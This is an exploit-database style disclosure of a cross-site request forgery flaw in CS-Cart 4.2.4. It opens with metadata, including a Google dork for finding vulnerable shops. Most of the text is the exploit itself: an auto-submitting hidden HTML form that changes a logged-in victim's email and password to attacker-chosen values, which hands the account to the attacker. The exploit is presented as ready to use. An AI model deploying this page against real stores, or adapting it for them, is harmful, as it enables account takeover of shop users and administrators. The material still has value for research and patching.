# Exploit Title: CS-Cart 4.2.4 CSRF # Google Dork: intext:"&#169; 2004-2015 Simtech" # Date: March 11, 2015 # Exploit Author: Luis Santana # Vendor Homepage: http://cs-cart.com # Software Link: https://www.cs-cart.com/index.php?dispatch=pages.get_trial&page_id=297&edition=ultimate # Version: 4.2.4 # Tested on: Linux + PHP # CVE : [if one exists, or other VDB reference] Standard CSRF, allow you to change a users's password. Fairly lame but I noticed no one had reported this bug yet. Exploit pasted below and attached. <html> <head> <title>CS-CART CSRF 0day Exploit</title> </head> <body> <!-- Discovered By: Connection Exploit By: Connection Blacksun Hacker's Club irc.blacksunhackers.com #lobby --> <form action="http://<victim>/cscart/profiles-update/?selected_section=general" method="POST" id="CSRF" style="visibility:hidden"> <input type="hidden" name="user_data[email]" value="hacked@lol.dongs" /> <input type="hidden" name="user_data[password1]" value="CSRFpass" /> <input type="hidden" name="user_data[password2]" value="CSRFpass" /> <input type="hidden" name="user_data[profile_name]" value="Concept" /> <input type="hidden" name="dispatch[profiles.update]" value="" /> </form> <script> document.getElementById("CSRF").submit(); </script> </body> </html> Luis Santana - Security+ Administrator - http://hacktalk.net HackTalk Security - Security From The Underground